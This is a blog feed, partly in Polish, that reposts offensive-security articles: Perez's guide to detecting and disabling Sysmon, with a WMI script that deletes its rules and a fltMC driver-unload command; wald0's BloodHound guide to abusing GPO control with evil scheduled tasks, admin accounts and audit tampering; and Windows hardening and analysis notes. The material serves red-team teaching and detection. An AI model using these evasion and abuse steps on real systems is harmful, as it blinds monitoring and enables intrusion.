Atakowanie powershell

8 January 2019

Source: https://github.com/trustedsec/unicorn

https://www.trustedsec.com/2018/06/weaponizing-settingcontent/

Magic Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory.

Based on Matthew Graeber's powershell attacks and the powershell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.

Bypass Sysmon

8 January 2019

Source: https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon

Shell is Only the Beginning

October 08, 2018 by Carlos Perez in Blue Team, Red Team, PowerShell

Sysmon is a tool written by Mark Russinovich that I have covered in multiple blog post and even wrote a PowerShell module called Posh-Sysmon to help with the generation of configuration files for it. Its main purpose is for the tracking of potentially malicious activity on individual hosts and it is based on the same technology as Procmon. It differs from other Sysinternals tools in that Sysmon is actually installed on the host and saves its information in to the Windows Eventlog so it is easier to be able to collect the information with the use of SIEM (Security Information and Event Management) tools. 

 Sysmon has the capability to log information for:

  • Process Creation and Termination
  • Process changing a file creation time.
  • Network Connection
  • Driver Load
  • Image Load
  • CreateRemoteThread
  • Raw Access Read of a file
  • A process opens another process memory
  • File Creation
  • Registry Events
  • Pipe Events
  • WMI Permanent Events 

 All of the logging is based on rules you specify using the sysmon.exe tool and saved in to the registry. Most enterprise environments will deploy Sysmon via package management and then push rules via the registry by pushing the binary blob to the hosts. 

Detect Control

 As offensive operators the first thing we need to do is identify if Sysmon is present on the system. Normally when we install Sysmon on a system it will create a service to load a driver, the registry key that will store the configuration for the service and the driver and install an event manifest to define the events and create the event log where it will put the events it generates so they can be collected. So, we have multiple places we can look. But sadly, most attackers are creatures of habit and will many times stick to the simplest solution that gives them the most bag for the buck you can say. In the case of detecting controls there is no difference most will perform one of the following actions:

  • List processes
  • List services
  • List drivers in C:\Windows\System32\Drivers

 The most common one is the listing of drivers since EDR solutions like Cylance will hide the service name depending how you call it and some solutions do not have processes running. 

 For this very reason Sysmon implement a feature where you can change the name of the exe and the driver so as to obfuscate its presence on the system. 

 To change the name of the service and the process you just rename the sysmon executable to whatever name you want. This is useful but as we can see in the output bellow the driver is not renamed. 

PS C:\Users\carlos\Desktop> .\HPPrinterController.exe -i

System Monitor v8.00 - System activity monitor

Copyright (C) 2014-2018 Mark Russinovich and Thomas Garnier

Sysinternals - www.sysinternals.com

 

HPPrinterController installed.

SysmonDrv installed.

Starting SysmonDrv.

SysmonDrv started.

Starting HPPrinterController..

HPPrinterController started.

To change the driver name we would need to specify it with the -d parameter during installation and specify a name for it. 

PS C:\Users\carlos\Desktop> .\HPPrinterController.exe -i -d hpprndrv

 

 

System Monitor v8.00 - System activity monitor

Copyright (C) 2014-2018 Mark Russinovich and Thomas Garnier

Sysinternals - www.sysinternals.com

 

HPPrinterController installed.

hpprndrv installed.

Starting hpprndrv.

hpprndrv started.

Starting HPPrinterController..

HPPrinterController started.

One thing to take in to account for uninstalling and updating the configuration of the service one has to use and copy of sysmon with the name we choose and the registry path for the configuration will also use the name we choose, this is very important during regular operation of upgrading sysmon and pushing out new rules. 

 We can still look at the filter drivers that have been loaded by the system and look at their altitude numbers using fltmc.exeor if our agent we are using it be Meterpreter, Beacon or any other with support for mimikatz we can also use mimikatz with the command misc::mfltto list in memory the driver altitude numbers. The sysmon driver will have an altitude number of 385201

With Mimikatz

mimikatz # misc::mflt

0 3     385201 hpprndrv

0 0     244000 storqosflt

0 1     189900 wcifs

0 0     180451 CldFlt

0 0     141100 FileCrypt

0 1     135000 luafv

0 1      46000 npsvctrig

0 3      40700 Wof

0 4      40500 FileInfo

With fltMC.exe:

PS C:\> fltMC.exe

 

Filter Name                     Num Instances    Altitude    Frame

------------------------------  -------------  ------------  -----

hpprndrv                                3       385201         0

storqosflt                              0       244000         0

wcifs                                   1       189900         0

CldFlt                                  0       180451         0

FileCrypt                               0       141100         0

luafv                                   1       135000         0

npsvctrig                               1        46000         0

Wof                                     3        40700         0

FileInfo                                4        40500         0

If we are operating in a more contested or non-permissive environment where running fltmc.exe or loading mimikatz is bound to raise alarms. A not so accurate way would be to check for the presence of the event log file for sysmon. It will at least let us know that sysmon is present or was installed on the system. For this we can check the registry key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Sysmon/Operational

PS C:\> ls HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels | Where-Object {$_.name -like "*sysmon*"}

 

 

    Hive: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels

 

 

Name                           Property

----                           --------

Microsoft-Windows-Sysmon/Opera OwningPublisher : {5770385f-c22a-43e0-bf4c-06f5698ffbd9}

tional                         Enabled         : 1

                               Isolation       : 2

                               ChannelAccess   : O:BAG:SYD:(A;;0xf0007;;;SY)(A;;0x7;;;BA)(A;;0x1;;;BO)(A;;0x1;;;SO)(A;;0x1;;;S-1-5-32-573)

                               MaxSize         : 67108864

                               MaxSizeUpper    : 0

                               Type            : 1

 

Other signs we can look in the registry is the registry key that all sysinternals tools populate to say set that the license was accepted for the tool. In the case of sysmon it will be listed in that key under HKCU\Software\Sysinternalsfor the user. 

PS C:\> ls HKCU:\Software\Sysinternals  | Select-Object name

 

Name

----

HKEY_CURRENT_USER\Software\Sysinternals\Process Explorer

HKEY_CURRENT_USER\Software\Sysinternals\Process Monitor

HKEY_CURRENT_USER\Software\Sysinternals\sigcheck

HKEY_CURRENT_USER\Software\Sysinternals\Streams

HKEY_CURRENT_USER\Software\Sysinternals\Strings

HKEY_CURRENT_USER\Software\Sysinternals\System Monitor

HKEY_CURRENT_USER\Software\Sysinternals\ZoomIt

There is also a way to find the service and now if there was a rename. Sysmon keeps the description of the service as “System Monitor service”even when it modified the name. This makes it trivial to identify the service by this string using WMI or SC.exe. 

PS C:\> Get-CimInstance win32_service -Filter "Description = 'System Monitor service'"

 

ProcessId Name                StartMode State   Status ExitCode

--------- ----                --------- -----   ------ --------

2220      HPPrinterController Auto      Running OK     0

 Circumventing Sysmon

 Working Around Rules

We have 2 options to circumvent sysmon the first one is to operate inside the blind spots of its rules set or to completely disable. Matt Grabber was able to reverse engineer and make public the format of the registry key and we can find a .Net assembly we can use in Cobalt Strike load assembly to read in memory the config written by HarmJ0y called Seatbelt https://github.com/GhostPack/Seatbeltor if we pull the registry key Matt has a PowerShell function to parse it https://github.com/mattifestation/PSSysmonTools/blob/master/PSSysmonTools/Code/SysmonRuleParser.ps1. By knowing the rules, we can operate around them. 

Deleting Configuration

We can clear the rule entry in the registry. Sysmon will see the registry being changed and it will automatically reload the configuration and since no rules are present it will be blinded temporarily depending on how the configuration is maintained. If the configuration is managed by a configuration management system like Ansible, Chef or DSC it could be a matter of seconds to minutes before the configuration is changed back to its original state in the case it is by a GPO it can be restored inside 90 minutes when the GPO updates. To combat this we can create in any Windows technology (.Net, VBS, PE File ..etc) a WMI Temporary Consumer https://docs.microsoft.com/en-us/windows/desktop/wmisdk/receiving-a-wmi-eventthat will monitor the registry key and when it notices a change to it to delete it or set its content again. The reason for a temporary consumer is that most solution look for WMI Permanent events being created or modified. 

$query = "SELECT * FROM RegistryKeyChangeEvent " +

    "WHERE Hive ='HKEY_LOCAL_MACHINE' " +

    "AND KeyPath ='SYSTEM\\CurrentControlSet\\Services\\SysmonDrv\\Parameters'"

 

Register-WMIEvent -Query $query -Action {

    Write-host "Sysmon config updated, deleting config."

    Remove-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\SysmonDrv\Parameters" -Name "Rules" } 

One of the things to keep in mind is that Sysmon will revert back to default configuration so it will log the process creation and process termination events.

If we want to track the use of the WMI filter this will be logged in the event log under WMI-Activity/Operational with an Event ID of 5860 with the field in EventData for Possible Cause of Temporary and it will also include the Process ID of the process that created it.

Another give away would be that if your configuration includes Rule Names for each filter if the configuration is that process creation and process termination events will have a blank rule name in them if using Sysmon 8.0.

You can also set auditing rules vial GPO on the registry key and log an event 4687 under the security log that will include the user and the process information for the change of the registry key. If under process information if it is not Sysmon or the process that changes the key under GPO updates you can trigger an alert on this in your SIEM.

Unload SysmonDrv Filter Driver

Another action that can be taken is to unload the SysmonDrv dfilter driver that gives Sysmon the information on all disk actions to then write to the eventlog. As we saw before this driver has a unique altitude number and if we are running as administrator we can unload this driver and Sysmon is essentially blinded completely. We can unload the driver with the fltmc.exe tool. Here we are unloading our hidden driver that we identified via the altitude number.

 

PS C:\> fltMC.exe

 

Filter Name                     Num Instances    Altitude    Frame

------------------------------  -------------  ------------  -----

hpprndrv                                3       385201         0

storqosflt                              0       244000         0

wcifs                                   1       189900         0

CldFlt                                  0       180451         0

FileCrypt                               0       141100         0

luafv                                   1       135000         0

npsvctrig                               1        46000         0

Wof                                     3        40700         0

FileInfo                                4        40500         0

PS C:\> fltMC.exe unload hpprndrv

PS C:\> fltMC.exe

 

Filter Name                     Num Instances    Altitude    Frame

------------------------------  -------------  ------------  -----

storqosflt                              0       244000         0

wcifs                                   1       189900         0

CldFlt                                  0       180451         0

FileCrypt                               0       141100         0

luafv                                   1       135000         0

npsvctrig                               1        46000         0

Wof                                     3        40700         0

FileInfo                                4        40500         0

Sysmon will actually log as its last command the execution of the command so this could be a trigger on SIEM when this command is executed and the unload parameter is used.

It will also be logged under the System log under event 1 source Filter Manager and Task Category of None

Conclusion

When identifying controls in an adversarial simulation is to look for more than one indicator of the presence of the control and when identified to pull the pertinent pieces of information that will inform us of the level of maturity and skill of the team of the targeted network. 

 

As always, I hope you find this blog post useful and informative. 

Update 10/8/18 - added screenshots of events in the event log and more details to track abuse.

 

Active Directory - examine :)

29 December 2018

source: https://wald0.com/?p=179

A Red Teamer’s Guide to GPOs and OUs

Active Directory is a vast, complicated landscape comprised of users, computers, and groups, and the complex, intertwining permissions and privileges that connect them. The initial release of BloodHound focused on the concept of derivative local admin, then BloodHound 1.3 introduced ACL-based attack paths. Now, with the release of BloodHound 1.5, pentesters and red-teamers can easily find attack paths that include abusing control of Group Policy, and the objects that those Group Policies effectively apply to.

In this blog post, I’ll recap how GPO (Group Policy Object) enforcement works, how to use BloodHound to find GPO-control based attack paths, and explain a few ways to execute those attacks.

 

 

Prior Work

Lucas Bouillot and Emmanuel Gras included GPO control and OU structure in their seminal work, “Chemins de contrôle en environnement Active Directory”. They used an attack graph to map which principals could take control of GPOs, and which OUs those GPOs applied to, then chased that down to the objects affected by those GPOs. We learned a lot from Lucas and Emannuel’s white paper (in French), and I’d highly recommend you read it as well.

There are several important authors and resources we leaned on when figuring out how GPO works, in no particular order: the Microsoft Group Policy team’s posts on TechNet, Sean Metcalf’s work at adsecurity.org, 14-time Microsoft MVP “GPO Guy” Darren Mar-Elia, Microsoft’s Group Policy functional specification, and last but certainly not least, Will Schroeder’s seminal blog post on Abusing GPO Permissions. Special extra thanks to Darren Mar-Elia for answering a lot of my questions about Group Policy. Thanks, Darren! Other resources and references are linked at the bottom of this blog post.

 

The Moving Parts of Group Policy

There’s no two ways about it: GPO enforcement is a complicated beast with a lot of moving parts. With that said, let’s start at the very basics with the vocabulary used in the rest of the post, and build up to explaining how those moving parts interact with one another:

GPO: A Group Policy Object. When an Active Directory domain is first created, two GPOs are created as well: “Default Domain Policy” and “Default Domain Controllers”. GPOs contain sets of policies that affect computers and users. For example, you can use a GPO policy to control the Windows desktop background on computers. GPOs are visible in the Group Policy Management GUI here:

Above: The list of GPOs in our test domain.

Technically, “Default Domain Controllers Policy” is the display name of the GPO, while the name of the GPO is a GPO curly braced “GUID”. I put “GUID” in quotation marks because this identifier is not actually globally unique. The “Default Domain Controllers Policy” in every Active Directory domain will have the same “name” (read: curly braced GUID): {6AC1786C-016F-11D2-945F-00C04fB984F9}. For this reason, GPOs have an additional parameter called objectguid, which actually is globally unique. The policy files for any given GPO reside in the domain SYSVOL at the policy’s gpcfilesyspath (ex: \\contoso.local\sysvol\contoso.local\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}).

Above: The relevant properties of the “Default Domain Controllers Policy” GPO, and that GPO’s policy files location in the SYSVOL.

OU: An Organizational Unit. According to Microsoft’s TechNet, OUs are “general-purpose container[s] that can be used to group most other object classes together for administrative purposes”. Basically, OUs are containers that you place principals (users, groups, and computers) into. Organizations will commonly use OUs to organize principals based on department and/or geographic location. Additionally, OUs can of course by nested within other OUs. This usually results in a relatively complex OU tree structure within a domain, which can be difficult to navigate without first being very familiar with the tree. You can see OUs in the ADUC (Active Directory Users and Computers) GUI. In the below screenshot, “ContosoUsers” is a child OU of the CONTOSO.LOCAL domain, “Helpdesk” is a child OU within  the “ContosoUsers” OU, and “Alice Admin” is a child user of the “Helpdesk” OU:

Above: The Alice Admin user within the OU tree.

GpLink: A Group Policy Link. GPOs can be “linked” to domains, sites, and OUs. By default, a GPO that is linked to an OU will apply to the child objects of that OU. For example, the “Default Domain Policy” GPO is linked, by default, to the domain object, while the “Default Domain Controllers Policy” is linked, by default, to the Domain Controllers OU. In the below screenshot, you can see that if we expand the “contoso.local” domain and the “Domain Controllers” OU, the GPOs linked to those objects appear below them:

Above: The “Default Domain Policy” is linked to the domain “contoso.local”. The “Default Domain Controllers” policy is linked to the “Domain Controllers” OU.

GpLinks are stored on the objects the GPO is linked to, on the attribute called “gplink”. The format of the “gplink” attribute value is [<Distinguished name of the GPO>;<0 if the link is not enforced, 1 if the link is enforced>]. You can easily enumerate those links with PowerView as in the example below:

Above: The “Default Domain Controllers Policy” GPO is linked to the “Domain Controllers” OU, and is not enforced.

Those three pieces — GPOs, OUs, and GpLinks — comprise the major moving parts we’re working with. It’s important to know those three pieces well before understanding GPO enforcement logic and how to use BloodHound to find attack paths, so make sure you feel confident with those before continuing on. One last note: GPOs can also be linked to sites, but at this time we’re not including that due to complications site memberships and collection challenges.

 

GPO Enforcement Logic

Now that you know the basic moving parts, let’s look more closely at how they connect. GPO enforcement logic, very briefly, works like this:

  • GpLinks can be enforced, or not.
  • OUs can block inheritance, or not.
  • If a GpLink is enforced, the associated GPO will apply to the linked OU and all child objects, regardless of whether any OU in that tree blocks inheritance.
  • If a GpLink is not enforced, the associated GPO will apply to the linked OU and all child  objects, unless any OU within that tree blocks inheritance.

There are further complications on top of this, which we’ll get to later on. First though, let’s visualize the above rules regarding GpLink enforcement and OUs blocking inheritance. Recall earlier I had a user called Alice Admin within a HelpDesk OU. Instead of looking at that in ADUC, though, let’s start to think about this as a graph:

Above: Alice Admin within the domain/OU tree.

The domain object, Contoso.Local, is a container object. It contains the OU called ContosoUsers. The OU ContosoUsers contains the OU HelpDesk. Finally, the OU HelpDesk contains the user Alice Admin.

Now, let’s add our Default Domain Policy GPO into the mix. Recall from earlier that in my test domain, that GPO is linked to the domain object:

Above: The “Default Domain Policy” GPO is linked to the domain object.

Now, in default circumstances, you can simply read from left to right to figure out that the Default Domain Policy will apply to the user Alice Admin. The “default circumstance” here is that the GpLink relationship is not enforced, and that none of the containers in this path block inheritance. Let’s add that information to the above graph:

In this circumstance, it doesn’t matter that the GpLink edge is not enforced, as none of the OUs block inheritance. In our test domain, we have another OU under ContosoUsers called “Accounting”, with one user in that OU: Bob User. For example’s sake, we’ll say that the Accounting OU does block inheritance. Let’s add that to our existing graph:

Again, we can see that the Default Domain Policy GPO is linked to the domain object, and Bob User is contained within the OU tree under the domain object; however, because the OU “Accounting” blocks inheritance, and because the GpLink edge is not enforced, the Default Domain Policy will not apply to Bob User.

Still with me? You’d be forgiven for being slightly confused at this point, but don’t worry, it gets worse!

Let’s add another GPO to the mix and link it to the domain object as well, except this time we will enforce the GpLink:

Our new GPO called “Custom Password Policy” is linked to the domain object, which again contains the entire OU tree under it. Now, because the GPLink is enforced, this policy will apply to all child objects in the OU tree, regardless of whether any of those OUs block inheritance. This means that the “Custom Password Policy” GPO will apply to both “Alice Admin” and “Bob User”, despite the “Accounting” OU blocking inheritance.

In our experience, this information is going to cover 95%+ of situations you’ll run into in real enterprise networks; however, there are three more things to know about, which may impact you when abusing GPO control paths during your pentests and red team assessments: WMI filtering, security filtering, and Group Policy link order and precedence.

  • WMI filtering allows administrators to further limit which computers and users a GPO will apply to, based on whether a certain WMI query returns True or False. For example, when a computer is processing group policy, it may run a WMI query that checks if the operating system is Windows 7, and only apply the group policy if that query returns true. See Darren Mar-Elia’s excellent blog post for further details.
  • Security filtering allows administrators to further limit which principals a GPO will apply to. Administrators can limit the GPO to apply to specific computers, users, or the members of a specific security group. By default, every GPO applies to the “Authenticated Users” principal, which includes any principal that successfully authenticates to the domain. For more details, see this post on the TechGenix site.
  • Group Policy link order dictates which Group Policy “wins” in the event of conflicting, non-merging policies. Imagine you have two “Password Policy” GPOs: one that requires users to change their password every 30 days, and one that requires users to change their password every 60 days. Whichever policy is higher in the precedence order is the policy that will “win”. The group policy client enforces this “win” condition by processing policies in reverse order of precedence, so the highest precedence policy is processed last, and “wins”. Luckily, you don’t need to worry about this for almost every abuse primitive. For more information, check out this blog post.

Like I said above, our experience has been that in real enterprise networks, you won’t need to worry about WMI filtering, security filtering, or GpLink order in 95% or more of the situations you run into, but I mention them so you know where to start troubleshooting if your abuse actions aren’t working. We may try to roll those three items into the BloodHound interface in the future. In the meantime, make sure your target computer and user objects won’t be filtered out by WMI or security filters, or attempt to push an evil group policy that will be overruled by a higher precedence policy.

 

Analysis with BloodHound

First, make sure you are running at least BloodHound 1.5.1. Second, do your standard SharpHound collection like you always have, but this time either do the “All” or “Containers” and “ACL” collection methods, which will collect GPO ACLs and OU structure for you:

C:\> SharpHound.exe -c All

Then, import the resulting acls.csv, container_gplinks.csv, and container_structure.csv through the BloodHound interface like normal. Now you’re ready to start analyzing outbound and inbound GPO control against objects.

For example, let’s take a look at our “Alice Admin” user. If we search for this user, then click on the user node, you’ll see some new information in the user tab, including “Effective Inbound GPOs”:

Above: Two GPOs apply to Alice Admin.

The Cypher query that generates this number does the GpLink enforcement and OU blocking inheritance logic for you, so you don’t need to worry about working that out yourself. Simply click on the number “2”, in this instance, to visualize the GPOs that apply to “Alice Admin”:

Above: How the two GPOs apply to Alice Admin.

Notice the edge connecting “Default Domain Policy” to the “Contoso.Local” domain is dotted. This means that this GPO is not enforced; however, all of the “Contains” edges are solid, meaning that none of those containers block inheritance. Recall from earlier that unenforced GpLinks will only be affected by OUs that block inheritance, so in this case, the Default Domain Policy still applies to Alice Admin.

Also note that the edge connecting “Customer Password Policy” to the “Contoso.Local” domain is solid. This means that this GPO is enforced, and will therefore apply to all children objects regardless of whether any subsequent containers block inheritance.

We can also see the flip side of this — what objects does any given GPO effectively apply to? First, let’s check out the Custom Password Policy GPO:

Above: The Custom Password Policy GPO applies to 3 computers and 5 users.

Reminder: GPOs can only apply to users and computers, not security groups.

By clicking on the numbers, you can render the objects affected by this GPO, and how the GPO applies to those objects. If we click the “5” next to “User Objects”, we get this graph:

Above: How the Customer Password Policy GPO applies to user objects.

There are two important things to point out here: again, the edge connecting the “Custom Password Policy” GPO to the “Contoso.Local” domain object is solid, meaning this GPO is enforced. Second, notice the edge connecting the “Accounting” OU to the “Bob User” user is dotted, indicating the “Accounting” OU blocks inheritance. But, because the “Custom Password Policy” GPO is enforced, the OU blocking inheritance doesn’t matter, and will be applied to the “Bob User” user anyway.

Compare the above graph to the graph we get if we do the same for the “Default Domain Policy”:

Above: The users affected by the “Default Domain Policy” GPO.

Notice how the “Bob User” user is no longer there? That’s because the “Default Domain Policy” GPO is not enforced. Because the “Accounting” OU blocks inheritance, that GPO will not apply to the “Bob User” user.

Alright, let’s put it all together and see if we can find an attack path from “Bob User” to “Alice Admin”. In the BloodHound search bar, click the path finding icon, then select your source node and target node. Hit enter, and BloodHound will find and render an attack path, if one exists:

Above: The attack path from “Bob User” to “Alice Admin”.

Reading this graph from left to right, we can see that “Bob User” is in a group called “Accounting”, which is part of a group called “Group Policy Admins” (believe me when I say crazier things have happened in the wild, and remember this is a contrived example :). The “Group Policy Admins” group has, as you would imagine, full control of the “Custom Password Policy” GPO. That GPO is then linked to the “Contoso.Local” domain. From here we have a couple options – push an evil policy down to the “Administrator” user and take over “Alice Admin” with an ACL based attack or just push an evil policy down directly to the “Alice Admin” user.

 

Abusing GPO Control

Finally, the most important part of this entire topic: how to actually take over computers and users with control over the GPOs that affect those users. For a bit of background and inspiration, read Will’s excellent blog post on abusing GPO rights, which contains information about the first proof-of-concept GPO abuse cmdlet that I’m aware of, New-GPOImmediateTask.

When people say “you can do anything with GPO”, they really mean it: you can do anything with GPO. Will and I put together this list of abuses against computers, including the policy location and abuse, just to give you a few ideas:

  • Policy Location: Computer Configuration\Preferences\Control Panel Settings\Folder Options
  • Abuse: Create/alter file type associations, register DDE actions with those associations.

 

  • Policy Location: Computer Configuration\Preferences\Control Panel Settings\Local Users and Groups
  • Abuse: Add new local admin account.

 

  • Policy Location: Computer Configuration\Preferences\Control Panel Settings\Scheduled Tasks
  • Abuse: Deploy a new evil scheduled task (ie: PowerShell download cradle).

 

  • Policy Location: Computer Configuration\Preferences\Control Panel Settings\Services
  • Abuse: Create and configure new evil services.
  • Policy Location: Computer Configuration\Preferences\Windows Settings\Files
  • Abuse: Affected computers will download a file from the domain controller.

 

  • Policy Location: Computer Configuration\Preferences\Windows Settings\INI Files
  • Abuse: Update existing INI files.

 

  • Policy Location: Computer Configuration\Preferences\Windows Settings\Registry
  • Abuse: Update specific registry keys. Very useful for disabling security mechanisms, or triggering code execution in any number of ways.

 

  • Policy Location: Computer Configuration\Preferences\Windows Settings\Shortcuts
  • Abuse: Deploy a new evil shortcut.

 

  • Policy Location: Computer Configuration\Policies\Software Settings\Software installation
  • Abuse: Deploy an evil MSI. The MSI must be available to the GP client via a network share.

 

  • Policy Location: Computer Configuration\Policies\Windows Settings\Scripts (startup/shutdown)
  • Abuse: Configure and deploy evil startup scripts. Can run scripts out of GPO directory, can also run PowerShell commands with arguments

 

  • Policy Location: Computer Configuration\Policies\Windows Settings\Security Settings\Local Policies\Audit Policy
  • Abuse: Modify local audit settings. Useful for evading detection.

 

  • Policy Location: Computer Configuration\Policies\Windows Settings\Security Settings\Local Policies\User Rights Assignment\
  • Abuse: Grant a user the right to logon via RDP, grant a user SeDebugPrivilege, grant a user the right to load device drivers, grant a user seTakeOwnershipPrivilege. Basically, take over the remote computer without ever being an administrator on it.

 

  • Policy Location: Computer Configuration\Policies\Windows Settings\Security Settings\Registry
  • Abuse: Alter DACLs on registry keys, grant yourself an extremely hard to find backdoor on the system.

 

  • Policy Location: Computer Configuration\Policies\Windows Settings\Security Settings\Windows Firewall
  • Abuse: Manage the Windows firewall. Open up ports if they’re blocked.

 

  • Policy Location: Computer Configuration\Preferences\Windows Settings\Environment
  • Abuse: Add UNC path for DLL side loading.

 

  • Policy Location: Computer Configuration\Preferences\Windows Settings\Files
  • Abuse: Copy a file from a remote UNC path.

So, that’s all well and good, but how do we actually take these actions? Currently, you’ve got two options: download and install the Group Policy Management Console and use the GPMC GUI to modify the relevant GPO or manually craft the relevant policy file and correctly modify the GPO and gpt.ini file.

As an example, let’s say you want to push a new immediate scheduled task to a computer or user. My current understanding (which is definitely subject to correction), based on testing and the Microsoft Group Policy Preferences functional spec, follows:

Whenever a group policy client (user or computer) checks for updated group policy, they will go through several steps to collect and apply Group Policy to themselves. The client will check whether the remote version of the GPO is greater than the locally cached version of that GPO (unless gpupdate /force is used). The remote version of the GPO is stored in two locations:

  1. As an integer value for the versionNumber attribute on the Group Policy Object itself.
  2. As the same integer in the GPT.INI file, located at \\<domain.com>\Policies\<gpo name>\GPT.ini. Note that the “name” of the GPO is not the display name. For instance, the “name” for the Default Domain Policy is {6AC1786C-016F-11D2-945F-00C04fB984F9}.

If the remote GPO version number is greater than the locally cached version, the group policy client will continue, analyzing which policies and/or preferences it needs to search for in the relevant SYSVOL directory. For Group Policy preferences (which scheduled tasks fall under), the group policy client will check to see which Client-Side Extensions (CSEs) exist as part of the “gPCMachineExtensionNames” and “gPCUserExtensionNames” attributes. According to the Microsoft Group Policy Preferences functional spec, CSE GUIDs “enable a specific client-side extension on the Group Policy client to be associated with policy data that is stored in the logical and physical components of a Group Policy Object (GPO) on the Group Policy server, for that particular extension.” The CSE GUIDs for Immediate Scheduled tasks, as they would be stored in the “gPCMachineExtensionNames” attribute, are:

[{00000000-0000-0000-0000-000000000000}{79F92669-4224-476C-9C5C-6EFB4D87DF4A}{CAB54552-DEEA-4691-817E-ED4A4D1AFC72}][{AADCED64-746C-4633-A97C-D61349046527}{CAB54552-DEEA-4691-817E-ED4A4D1AFC72}]

And in a slightly more readable format:

[
    {00000000-0000-0000-0000-000000000000}
    {79F92669-4224-476C-9C5C-6EFB4D87DF4A}
    {CAB54552-DEEA-4691-817E-ED4A4D1AFC72}
]
[
    {AADCED64-746C-4633-A97C-D61349046527}
    {CAB54552-DEEA-4691-817E-ED4A4D1AFC72}
]

This translates to the following:

[
    {Core GPO Engine}
    {Preference Tool CSE GUID Local users and groups}
    {Preference Tool CSE GUID Scheduled Tasks}
]
[
    {Preference CSE GUID Scheduled Tasks}
    {Preference Tool CSE GUID Scheduled Tasks}
]

Once the group policy client understands that there are some scheduled tasks that apply to it, it will search for a file in the GP directory called ScheduledTasks.xml. That file exists in a predictable location:

\\<domain.com>\sysvol\<domain.com>\Policies\<gpo-name>\Machine\Preferences\ScheduledTasks.xml

Finally, the group policy client will parse the ScheduledTasks.xml and register the task locally.

That’s how the process works, as I understand it. There is still a lot of work to be done on crafting scripts to automate the GPO abuse process, as installing GPMC is rarely a great option while on a red team assessment. If ever there were a call to arms, this is it: we’ll continue working on creating scripts that reliably automate GPO control abuse, but are equally as excited to see what people in the community can come up with as well.

 

Conclusion

As Rohan mentioned in his post, BloodHound 1.5 represents a pretty big milestone for the BloodHound project. By adding in GPOs and OU structure, we’re greatly increasing the scope of Active Directory attack surface you can easily map out with BloodHound. In a future blog post, I’ll focus more on the defensive side of things, showing how defenders can use BloodHound to analyze and reduce the attack surface in AD now that we’re tracking GPOs and OU structure.

BloodHound is available free and open source on GitHub at https://github.com/BloodHoundAD/BloodHound
You can join us on Slack at the official BloodHound Gang Slack here: https://bloodhoundgang.herokuapp.com/

 

 

DRIF wyliczenie hash rekursywnie w windows

13 August 2018



current folder: dir | Get-FileHash

current folder and subfolders: dir -recurse | Get-FileHash

exclude *.log files: dir -recurse -exclude *.log | Get-FileHash

Note, default hashing algorithm is SHA256. You can use any of: MD5, SHA1, SHA256 (default), SHA384, SHA512, MACTripleDES, RIPEMD160:

dir -recurse -exclude *.log | Get-FileHash -Algorithm SHA512

more details: Get-Help Get-FileHash

current folder and subfolders: long line wrap:  dir -recurse | Get-FileHash | Format-Table -Wrap

Pisanie niestandardowych zasobów DSC z MOF

15 June 2018

Pisanie niestandardowych zasobów DSC z MOF

DSC i MOF - power shell

https://docs.microsoft.com/pl-pl/powershell/dsc/authoringresourcemof

Kategorie Power Shell, Windows

Windows Defender Device Guard

10 June 2018

https://demo.wd.microsoft.com/?ocid=cx-wddocs-testground

 

https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/windows-defender-exploit-guard

https://docs.microsoft.com/en-us/windows/security/threat-protection/device-guard/introduction-to-device-guard-virtualization-based-security-and-windows-defender-application-control

Audit Windows Infrastructre

10 June 2018

WINSpect script provides audit checks and enumeration

  • Checking for installed security products.
  • Checking for DLL hijackability (Authenticated Users security context).
  • Checking for User Account Control settings.
  • Checking for unattended installs leftovers.
  • Enumerating world-exposed local filesystem shares.
  • Enumerating domain users and groups with local group membership.
  • Enumerating registry autoruns.
  • Enumerating local services that are configurable by Authenticated Users group members.
  • Enumerating local services for which corresponding binary is writable by Authenticated Users group members.
  • Enumerating non-system32 Windows Hosted Services and their associated DLLs.
  • Enumerating local services with unquoted path vulnerability.
  • Enumerating non-system scheduled tasks

https://github.com/A-mIn3/WINspect

https://isc.sans.edu/forums/diary/Windows+Auditing+with+WINspect/22810/

Ciekawy materiał do poszukiwania

4 June 2018

Detecting Lateral Movement through Tracking Event Logs (japan CERT)

https://www.jpcert.or.jp/english/pub/sr/20170612ac-ir_research_en.pdf

Silent windows 10 for Malware Analysis

9 May 2018

sc stop DiagTrack

sc stop diagnosticshub.standardcollector.service

sc stop dmwappushservice

sc stop WMPNetworkSvc

sc stop WSearch

sc stop wuauserv

 

sc config DiagTrack start= disabled

sc config diagnosticshub.standardcollector.service start= disabled

sc config dmwappushservice start= disabled

sc config WMPNetworkSvc start= disabled

sc config WSearch start= disabled

sc config wuauserv start= disabled

 

 

schtasks /Change /TN "Microsoft\Windows\AppID\SmartScreenSpecific" /Disable

schtasks /Change /TN "Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser" /Disable

schtasks /Change /TN "Microsoft\Windows\Application Experience\ProgramDataUpdater" /Disable

schtasks /Change /TN "Microsoft\Windows\Application Experience\StartupAppTask" /Disable

schtasks /Change /TN "Microsoft\Windows\Customer Experience Improvement Program\Consolidator" /Disable

schtasks /Change /TN "Microsoft\Windows\Customer Experience Improvement Program\KernelCeipTask" /Disable

schtasks /Change /TN "Microsoft\Windows\Customer Experience Improvement Program\UsbCeip" /Disable

schtasks /Change /TN "Microsoft\Windows\Customer Experience Improvement Program\Uploader" /Disable

schtasks /Change /TN "Microsoft\Windows\Shell\FamilySafetyUpload" /Disable

schtasks /Change /TN "Microsoft\Office\OfficeTelemetryAgentLogOn" /Disable

schtasks /Change /TN "Microsoft\Office\OfficeTelemetryAgentFallBack" /Disable

schtasks /Change /TN "Microsoft\Office\Office 15 Subscription Heartbeat" /Disable

 

schtasks /Change /TN "Microsoft\Windows\Autochk\Proxy" /Disable

schtasks /Change /TN "Microsoft\Windows\CloudExperienceHost\CreateObjectTask" /Disable

schtasks /Change /TN "Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticDataCollector" /Disable

